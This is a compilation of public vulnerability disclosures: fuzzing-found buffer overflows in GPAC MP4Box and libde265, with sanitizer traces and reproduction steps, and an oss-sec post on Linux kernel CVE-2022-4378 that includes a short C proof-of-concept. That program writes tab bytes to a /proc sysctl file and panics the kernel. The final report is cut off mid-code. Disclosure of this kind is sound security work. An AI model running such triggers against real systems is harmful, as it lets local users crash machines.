GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

heap-buffer-overflow media\_tools/av\_parsers.c:4988 in gf\_media\_nalu\_add\_emulation\_bytes

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -catx poc_bof14.mp4
    

Crash reported by sanitizer

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    =================================================================
    ==745696==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000014780 at pc 0x7f373f26d683 bp 0x7ffd5a01c290 sp 0x7ffd5a01c280
    WRITE of size 1 at 0x615000014780 thread T0
        #0 0x7f373f26d682 in gf_media_nalu_add_emulation_bytes media_tools/av_parsers.c:4988
        #1 0x7f373f26d682 in gf_avc_reformat_sei media_tools/av_parsers.c:6355
        #2 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #3 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #4 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #5 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #6 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #7 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #8 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #9 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #10 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #11 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #12 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #13 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #14 0x7f373c83be3f in __libc_start_main_impl ../csu/libc-start.c:392
        #15 0x55b1ec082cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x615000014780 is located 0 bytes to the right of 512-byte region [0x615000014580,0x615000014780)
    allocated by thread T0 here:
        #0 0x7f37423a4867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7f373ea2c72a in gf_bs_new utils/bitstream.c:154
        #2 0x7f373f26c993 in gf_avc_reformat_sei media_tools/av_parsers.c:6227
        #3 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #4 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #5 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #6 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #7 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #8 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #9 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #10 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #11 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #12 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #13 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #14 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
    Shadow bytes around the buggy address:
      0x0c2a7fffa8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2a7fffa8f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==745696==ABORTING
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -catx poc_bof14.mp4
    

The crash will happen at another place

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16962257
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 16 size error (45 but 7 remain), keeping full SEI untouched
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 32527
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16964897
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 63
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    realloc(): invalid next size
    Aborted
    

realloc(): invalid next size indicates that there was a bof on heap indeed, overwriting the size field of a heap chunk.

**POC**

poc\_bof14.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47661: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes · Issue #2358 · gpac/gpac

Libde265 1.0.9 is vulnerable to Buffer Overflow in function void put_qpel_fallback<unsigned short>

**Description**

stack-buffer-overflow (libde265/build/libde265/libde265.so+0x17d304) in void put\_qpel\_fallback(short\*, long, unsigned short const\*, long, int, int, short\*, int, int, int)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 poc.bin
    

**ASAN**

    WARNING: coded parameter out of range
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    =================================================================
    ==3829==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffea52d35f at pc 0x7f8966bd5305 bp 0x7fffea52ac00 sp 0x7fffea52abf0
    READ of size 2 at 0x7fffea52d35f thread T0
        #0 0x7f8966bd5304 in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304)
        #1 0x7f8966bd08c2 in put_qpel_1_0_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1788c2)
        #2 0x7f8966c0152e in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a952e)
        #3 0x7f8966c02c0f in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aac0f)
        #4 0x7f8966bf3a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
        #5 0x7f8966c00a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
        #6 0x7f8966c3dd2a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e5d2a)
        #7 0x7f8966c3f774 in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e7774)
        #8 0x7f8966c40762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
        #9 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #10 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #11 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #12 0x7f8966c37d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
        #13 0x7f8966c40f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #14 0x7f8966c42c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #15 0x7f8966b95e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #16 0x7f8966b96673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #17 0x7f8966b95311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #18 0x7f8966b9505b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
        #19 0x7f8966b97be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #20 0x7f8966b9824c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #21 0x7f8966b7e3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #22 0x562ac9c989a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #23 0x7f8966526d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #24 0x7f8966526e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #25 0x562ac9c967c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    Address 0x7fffea52d35f is located in stack of thread T0 at offset 9391 in frame
        #0 0x7f8966c02203 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa203)
    
      This frame has 2 object(s):
        [48, 9136) 'mcbuffer' (line 71)
        [9392, 15072) 'padbuf' (line 129) <== Memory access at offset 9391 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304) in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int)
    Shadow bytes around the buggy address:
      0x10007d49da10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da40: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x10007d49da50: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
    =>0x10007d49da60: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]00 00 00 00
      0x10007d49da70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49daa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49dab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3829==ABORTING
    

**POC**

poc.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47655: Another stack-buffer-overflow in function void put_qpel_fallback<unsigned short> · Issue #367 · strukturag/libde265

A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system.

**oss-sec mailing list archives**

_From_: Kyle Zeng <zengyhkyle () gmail com>  
_Date_: Fri, 9 Dec 2022 09:11:25 -0700  

Hi there,

I recently found a stack-based buffer overflow in the Linux kernel,
which can cause DOS and is potentially exploitable. This bug affects
the following kernel versions: latest, 6.0, 5.15, 5.10, 5.4, 4.19,
4.14, and 4.9. I already contacted security () kernel org and helped them
patch the vulnerable kernel versions.

# Vulnerability
The vulnerability is caused by a missing check on user input. More
specifically, \_\_do\_proc\_dointvec function has the following snippet:
~~~
if (write) {
    ......
    if (left > PAGE\_SIZE - 1)
        left = PAGE\_SIZE - 1;
    p = buffer;
}
......
if (write) {
    left -= proc\_skip\_spaces(&p);
~~~
In this snippet, \`buffer\` and \`p\` represent a buffer containing
user-supplied input and it can contain more than 1 page of data. It
first truncates user input to 1 page (by marking number of bytes
\`left\` as 1 page). However, in a later call to \`proc\_skip\_spaces\` (a
function that assumes the argument is a NULL-terminated string), it
forgets the "up to 1 page" limit, processes all user input, and
calculates how many leading spaces are there in the user input. In the
buffer contains more than 1 page of spaces, \`left\` will be set to a
negative value. The negative value will then be passed to
\`proc\_get\_long\` and the least significant 4 bytes will be used as
length for memcpy that copies data to kernel stack, causing
stack-based buffer overflow: (the check on \`len\` won't work because
\`len\` is signed)
~~~
static int proc\_get\_long(...)
{
    char tmp\[TMPBUFLEN\];
    int len = \*size;

    if (len > TMPBUFLEN - 1)
        len = TMPBUFLEN - 1;

    memcpy(tmp, \*buf, len);
    ......
}
~~~

# Patch
The patch consists of two parts:
1.  refactor \`proc\_skip\_spaces\`, instead of assuming the argument is a
NULL-terminated string, it now will process data up to a limit. The
patch can be found here:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce9332220bd677d83b19d21502776ad555a0e73
2. fix the signness issue in \`len\`:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6cfaf34be9fcd1a8285a294e18986bfc41a409c

# Trigger
The bug is triggerable by non-root users if they have access to
user-namespace. A proof-of-concept crash program that causes kernel
panic is attached. To run the POC, you need net namespace. In other
words, you can trigger the bug using the following command: \`unshare
-rn\` and then \`./poc\`.

Best,
Kyle Zeng

===========================================
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("/proc/sys/net/ipv4/tcp\_rmem", O\_WRONLY);
    void \*a = mmap(NULL, 0x2000, PROT\_READ|PROT\_WRITE,
MAP\_ANON|MAP\_PRIVATE, -1, 0);
    memset(a, '\\x09', 0x2000);
    write(fd, a, 0x2000);
    return 0;
}
============================================
\[    7.150435\] BUG: stack guard page was hit at 00000000eea91c87
(stack is 00000000fdd90d6b..000000009d81213d)
\[    7.152330\] kernel stack overflow (page fault): 0000 \[#1\] SMP NOPTI
\[    7.153467\] CPU: 3 PID: 476 Comm: poc Not tainted 5.10.157 #37
\[    7.154815\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.15.0-1 04/01/2014
\[    7.156633\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.157118\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.158177\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.158488\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.158932\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.159347\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.159802\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.160201\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.160603\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.161053\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.161373\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.161769\] PKRU: 55555554
\[    7.161924\] Call Trace:
\[    7.162076\]  proc\_get\_long+0x90/0x190
\[    7.162286\] Modules linked in:
\[    7.162463\] ---\[ end trace d4a913b02029fee9 \]---
\[    7.162722\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.162952\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.164044\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.164370\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.164780\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.165188\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.165595\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.166002\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.166431\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.166889\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.167218\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.167661\] PKRU: 55555554
\[    7.167820\] Kernel panic - not syncing: Fatal exception
\[    7.168333\] Kernel Offset: disabled
\[    7.168544\] Rebooting in 1000 seconds..

**Current thread:**

*   **CVE-2022-4378: Linux kernel stack-based buffer overflow** _Kyle Zeng (Dec 09)_

CVE-2022-4378: Linux kernel stack-based buffer overflow

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow via gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c

for (i=0; i<sps\_rpl1\_same\_as\_rpl0; i++) {
  u32 j;
  sps->num\_ref\_pic\_lists\[i\] = gf\_bs\_read\_ue\_log\_idx(bs, "sps\_num\_ref\_pic\_lists", i);
  for (j=0; j<sps->num\_ref\_pic\_lists\[i\]; j++) {
	  s32 res = vvc\_parse\_ref\_pic\_list\_struct(bs, sps, i, j, &sps->rps\[i\]\[j\]); // when j == 64, overflow sps->rps
	  if (res<0) return res;
  }
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc.mp4
    

Crash reported by sanitizer

    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10710:71: runtime error: index 65 out of bounds for type 'VVC_RefPicList [64]'
    

**POC**

poc\_bof.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

xdchase

CVE-2022-47089: Buffer overflow in gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c · Issue #2338 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b has a Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_pps\_bs\_internal function of media\_tools/av\_parsers.c

while (nb\_ctb\_left >= uni\_size\_ctb) {
	nb\_ctb\_left -= uni\_size\_ctb;
	pps->tile\_rows\_height\_ctb\[pps->num\_tile\_rows\] = uni\_size\_ctb; // when pps->num\_tile\_rows == 32, overflow at pps->tile\_rows\_height\_ctb
	pps->num\_tile\_rows++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof2.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [VVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:10985:29: runtime error: index 33 out of bounds for type 'u32 [33]'
    

**POC**

poc\_bof2.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47087: Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c · Issue #2339 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

buffer overflow in gf\_vvc\_read\_pps\_bs\_internal function of media\_tools/av\_parsers.c

while (nb\_ctb\_left >= uni\_size\_ctb) {
	nb\_ctb\_left -= uni\_size\_ctb;
	pps->tile\_cols\_width\_ctb\[pps->num\_tile\_cols\] = uni\_size\_ctb; // when pps->num\_tile\_cols == 30, overflow at pps->tile\_cols\_width\_ctb
